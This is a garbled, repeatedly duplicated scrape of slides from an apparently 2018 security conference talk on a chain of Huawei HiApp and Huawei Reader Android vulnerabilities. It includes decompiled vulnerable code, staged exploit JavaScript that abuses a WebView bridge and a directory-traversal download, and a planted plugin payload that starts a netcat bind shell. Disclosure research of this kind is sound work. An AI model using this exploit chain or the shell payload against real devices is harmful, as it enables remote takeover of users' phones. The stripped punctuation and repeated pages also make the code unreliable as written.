documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 30: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 31: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 32: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 33: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

